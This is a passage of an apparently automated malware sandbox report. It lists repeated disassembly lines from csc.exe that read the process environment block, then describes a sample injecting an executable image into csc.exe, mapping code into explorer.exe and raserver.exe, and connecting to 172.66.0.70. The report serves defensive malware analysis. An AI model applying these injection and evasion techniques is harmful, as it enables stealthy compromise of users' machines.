          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70680 mov eax, dword ptr fs:[00000030h]3_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C68690 mov eax, dword ptr fs:[00000030h]3_2_05C68690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F68C mov eax, dword ptr fs:[00000030h]3_2_05D1F68C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CEC691 mov eax, dword ptr fs:[00000030h]3_2_05CEC691
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D286A8 mov eax, dword ptr fs:[00000030h]3_2_05D286A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D286A8 mov eax, dword ptr fs:[00000030h]3_2_05D286A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C63640 mov eax, dword ptr fs:[00000030h]3_2_05C63640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F640 mov eax, dword ptr fs:[00000030h]3_2_05C7F640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F640 mov eax, dword ptr fs:[00000030h]3_2_05C7F640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F640 mov eax, dword ptr fs:[00000030h]3_2_05C7F640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C640 mov eax, dword ptr fs:[00000030h]3_2_05C9C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C640 mov eax, dword ptr fs:[00000030h]3_2_05C9C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5D64A mov eax, dword ptr fs:[00000030h]3_2_05C5D64A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5D64A mov eax, dword ptr fs:[00000030h]3_2_05C5D64A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9265C mov eax, dword ptr fs:[00000030h]3_2_05C9265C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9265C mov ecx, dword ptr fs:[00000030h]3_2_05C9265C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9265C mov eax, dword ptr fs:[00000030h]3_2_05C9265C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6965A mov eax, dword ptr fs:[00000030h]3_2_05C6965A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6965A mov eax, dword ptr fs:[00000030h]3_2_05C6965A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C95654 mov eax, dword ptr fs:[00000030h]3_2_05C95654
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9666D mov esi, dword ptr fs:[00000030h]3_2_05C9666D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9666D mov eax, dword ptr fs:[00000030h]3_2_05C9666D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9666D mov eax, dword ptr fs:[00000030h]3_2_05C9666D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C57662 mov eax, dword ptr fs:[00000030h]3_2_05C57662
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C57662 mov eax, dword ptr fs:[00000030h]3_2_05C57662
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C57662 mov eax, dword ptr fs:[00000030h]3_2_05C57662
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73660 mov eax, dword ptr fs:[00000030h]3_2_05C73660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73660 mov eax, dword ptr fs:[00000030h]3_2_05C73660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73660 mov eax, dword ptr fs:[00000030h]3_2_05C73660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C60670 mov eax, dword ptr fs:[00000030h]3_2_05C60670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2670 mov eax, dword ptr fs:[00000030h]3_2_05CA2670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2670 mov eax, dword ptr fs:[00000030h]3_2_05CA2670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9360F mov eax, dword ptr fs:[00000030h]3_2_05C9360F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8D600 mov eax, dword ptr fs:[00000030h]3_2_05C8D600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8D600 mov eax, dword ptr fs:[00000030h]3_2_05C8D600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34600 mov eax, dword ptr fs:[00000030h]3_2_05D34600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F607 mov eax, dword ptr fs:[00000030h]3_2_05D1F607
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C65622 mov eax, dword ptr fs:[00000030h]3_2_05C65622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C65622 mov eax, dword ptr fs:[00000030h]3_2_05C65622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C67623 mov eax, dword ptr fs:[00000030h]3_2_05C67623
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C620 mov eax, dword ptr fs:[00000030h]3_2_05C9C620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C60630 mov eax, dword ptr fs:[00000030h]3_2_05C60630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C90630 mov eax, dword ptr fs:[00000030h]3_2_05C90630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C mov ecx, dword ptr fs:[00000030h]3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C mov ecx, dword ptr fs:[00000030h]3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C mov eax, dword ptr fs:[00000030h]3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE8633 mov esi, dword ptr fs:[00000030h]3_2_05CE8633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE8633 mov eax, dword ptr fs:[00000030h]3_2_05CE8633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE8633 mov eax, dword ptr fs:[00000030h]3_2_05CE8633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701C0 mov eax, dword ptr fs:[00000030h]3_2_05C701C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701C0 mov eax, dword ptr fs:[00000030h]3_2_05C701C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C691E5 mov eax, dword ptr fs:[00000030h]3_2_05C691E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C691E5 mov eax, dword ptr fs:[00000030h]3_2_05C691E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C581EB mov eax, dword ptr fs:[00000030h]3_2_05C581EB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C591F0 mov eax, dword ptr fs:[00000030h]3_2_05C591F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C591F0 mov eax, dword ptr fs:[00000030h]3_2_05C591F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701F1 mov eax, dword ptr fs:[00000030h]3_2_05C701F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701F1 mov eax, dword ptr fs:[00000030h]3_2_05C701F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701F1 mov eax, dword ptr fs:[00000030h]3_2_05C701F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8F1F0 mov eax, dword ptr fs:[00000030h]3_2_05C8F1F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8F1F0 mov eax, dword ptr fs:[00000030h]3_2_05C8F1F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D281EE mov eax, dword ptr fs:[00000030h]3_2_05D281EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D281EE mov eax, dword ptr fs:[00000030h]3_2_05D281EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C64180 mov eax, dword ptr fs:[00000030h]3_2_05C64180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C64180 mov eax, dword ptr fs:[00000030h]3_2_05C64180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C64180 mov eax, dword ptr fs:[00000030h]3_2_05C64180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA1190 mov eax, dword ptr fs:[00000030h]3_2_05CA1190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA1190 mov eax, dword ptr fs:[00000030h]3_2_05CA1190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C89194 mov eax, dword ptr fs:[00000030h]3_2_05C89194
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D351B6 mov eax, dword ptr fs:[00000030h]3_2_05D351B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E1A4 mov eax, dword ptr fs:[00000030h]3_2_05C9E1A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E1A4 mov eax, dword ptr fs:[00000030h]3_2_05C9E1A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C941BB mov ecx, dword ptr fs:[00000030h]3_2_05C941BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C941BB mov eax, dword ptr fs:[00000030h]3_2_05C941BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C941BB mov eax, dword ptr fs:[00000030h]3_2_05C941BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C931BE mov eax, dword ptr fs:[00000030h]3_2_05C931BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C931BE mov eax, dword ptr fs:[00000030h]3_2_05C931BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A147 mov eax, dword ptr fs:[00000030h]3_2_05C5A147
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A147 mov eax, dword ptr fs:[00000030h]3_2_05C5A147
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A147 mov eax, dword ptr fs:[00000030h]3_2_05C5A147
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D33157 mov eax, dword ptr fs:[00000030h]3_2_05D33157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D33157 mov eax, dword ptr fs:[00000030h]3_2_05D33157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D33157 mov eax, dword ptr fs:[00000030h]3_2_05D33157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9415F mov eax, dword ptr fs:[00000030h]3_2_05C9415F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D35149 mov eax, dword ptr fs:[00000030h]3_2_05D35149
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9716D mov eax, dword ptr fs:[00000030h]3_2_05C9716D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CB717A mov eax, dword ptr fs:[00000030h]3_2_05CB717A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CB717A mov eax, dword ptr fs:[00000030h]3_2_05CB717A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C66179 mov eax, dword ptr fs:[00000030h]3_2_05C66179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6510D mov eax, dword ptr fs:[00000030h]3_2_05C6510D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C90118 mov eax, dword ptr fs:[00000030h]3_2_05C90118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C97128 mov eax, dword ptr fs:[00000030h]3_2_05C97128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C97128 mov eax, dword ptr fs:[00000030h]3_2_05C97128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F13E mov eax, dword ptr fs:[00000030h]3_2_05D1F13E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CEA130 mov eax, dword ptr fs:[00000030h]3_2_05CEA130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7B0D0 mov eax, dword ptr fs:[00000030h]3_2_05C7B0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5C0F6 mov eax, dword ptr fs:[00000030h]3_2_05C5C0F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9D0F0 mov eax, dword ptr fs:[00000030h]3_2_05C9D0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9D0F0 mov ecx, dword ptr fs:[00000030h]3_2_05C9D0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1949C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 0_2_00007FF72F60B64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D22000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D226B0 SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 172.66.0.70 80
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
